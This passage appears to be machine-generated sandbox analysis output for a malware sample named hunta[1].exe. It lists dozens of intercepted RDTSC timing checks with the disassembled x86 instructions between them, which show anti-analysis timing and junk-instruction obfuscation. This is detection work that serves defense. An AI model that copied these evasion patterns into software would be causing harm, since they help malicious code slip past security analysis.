Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148723 second address: 1148740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 and dl, 0000001Bh 0x0000000b push 00000000h 0x0000000d xor dword ptr [ebp+122D1A23h], esi 0x00000013 push 4EE73472h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148740 second address: 1148744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148744 second address: 11487AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 4EE734F2h 0x0000000e mov ecx, dword ptr [ebp+122D2ADDh] 0x00000014 push 00000003h 0x00000016 jne 00007FF2E5514DECh 0x0000001c mov esi, dword ptr [ebp+122D2815h] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007FF2E5514DE8h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D23CFh], ebx 0x00000044 push 00000003h 0x00000046 and ecx, 7F146AAAh 0x0000004c push 44534459h 0x00000051 push eax 0x00000052 push edx 0x00000053 push ebx 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 pop ebx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 114886B second address: 1148870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148870 second address: 1148876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148876 second address: 11488F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c and ebx, dword ptr [ebp+122D28A1h] 0x00000012 call 00007FF2E55A2C2Fh 0x00000017 sub dword ptr [ebp+122D1888h], ebx 0x0000001d pop esi 0x0000001e popad 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FF2E55A2C28h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b jmp 00007FF2E55A2C31h 0x00000040 push C06D0BD7h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FF2E55A2C39h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148A9F second address: 1148AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF0h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1148AB9 second address: 1148B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 00E98075h 0x0000000d jmp 00007FF2E55A2C34h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF2E55A2C28h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 sub esi, dword ptr [ebp+122D18BAh] 0x00000036 push 00000003h 0x00000038 mov dword ptr [ebp+122D1A42h], ecx 0x0000003e push 92C0012Ch 0x00000043 pushad 0x00000044 ja 00007FF2E55A2C2Ch 0x0000004a je 00007FF2E55A2C26h 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1132A23 second address: 1132A6C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E5514E12h 0x00000008 jmp 00007FF2E5514DF7h 0x0000000d jmp 00007FF2E5514DF5h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FF2E5514DEEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11670EB second address: 116710C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E55A2C30h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116710C second address: 1167112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167112 second address: 116711F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FF2E55A2C26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116711F second address: 1167123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167398 second address: 116739C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116739C second address: 11673B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF2E5514DEEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167501 second address: 1167507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167655 second address: 116767B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FF2E5514DECh 0x0000000b jmp 00007FF2E5514DEEh 0x00000010 pop esi 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167ABD second address: 1167AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167EC1 second address: 1167EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1167EDB second address: 1167EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1134565 second address: 1134571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FF2E5514DE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116832D second address: 116834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF2E55A2C26h 0x0000000a jp 00007FF2E55A2C26h 0x00000010 popad 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FF2E55A2C2Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116834B second address: 1168352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168352 second address: 1168357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168357 second address: 1168370 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007FF2E5514DE6h 0x00000009 js 00007FF2E5514DE6h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jnc 00007FF2E5514DE6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11688EF second address: 11688F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168B7E second address: 1168B84 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168CF7 second address: 1168CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168CFD second address: 1168D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E5514DF2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1168D18 second address: 1168D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116B422 second address: 116B42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116E9C6 second address: 116E9D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116EB09 second address: 116EB0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116EB0E second address: 116EB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E55A2C26h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116EB24 second address: 116EB36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DEDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116EB36 second address: 116EB3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 116EC38 second address: 116EC51 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF2E5514DF1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1170CD1 second address: 1170CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1170CDE second address: 1170CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1170CE2 second address: 1170CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1170CE6 second address: 1170CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 113E585 second address: 113E58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1139529 second address: 113952D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174B74 second address: 1174B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174B8D second address: 1174B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174B9D second address: 1174BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C2Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174BB1 second address: 1174BB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174BB7 second address: 1174BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174D1A second address: 1174D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FF2E5514DE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1174D26 second address: 1174D5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FF2E55A2C41h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jnc 00007FF2E55A2C26h 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11785CF second address: 11785EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117889D second address: 11788AE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11788AE second address: 11788B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117897D second address: 1178982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1178982 second address: 1178987 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1178987 second address: 1178995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1178B17 second address: 1178B27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117BA2F second address: 117BA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117BA37 second address: 117BA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx esi, ax 0x0000000c push 00000000h 0x0000000e or si, ABC4h 0x00000013 push edx 0x00000014 sub edi, dword ptr [ebp+122D2232h] 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FF2E5514DE8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push eax 0x00000038 jo 00007FF2E5514DEEh 0x0000003e push esi 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117CC1E second address: 117CC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C293 second address: 117C297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117CC22 second address: 117CC38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C297 second address: 117C2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C2A1 second address: 117C2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C2A5 second address: 117C2B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117D4E8 second address: 117D4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C2B3 second address: 117C2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117D85D second address: 117D86B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117C2B7 second address: 117C2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117D86B second address: 117D870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117F7ED second address: 117F7F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117F52B second address: 117F53D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FF2E55A2C2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 117F7F7 second address: 117F81C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E5514DEEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1180316 second address: 118031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118031C second address: 1180321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1182CE4 second address: 1182D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 and di, 836Ah 0x0000000d and ebx, 61A24A19h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF2E55A2C28h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov ebx, ecx 0x00000031 mov dword ptr [ebp+1244C063h], edi 0x00000037 push 00000000h 0x00000039 mov bl, 7Eh 0x0000003b push eax 0x0000003c push esi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185B82 second address: 1185B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185B86 second address: 1185B9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E55A2C2Bh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185B9D second address: 1185BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FF2E5514DE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185BAC second address: 1185C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FF2E55A2C28h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 movsx edi, dx 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D1F90h], ecx 0x0000002d push 00000000h 0x0000002f clc 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FF2E55A2C38h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1182F2A second address: 1182F41 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF2E5514DECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185DAD second address: 1185DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1182F41 second address: 1182F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1182F45 second address: 1182F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
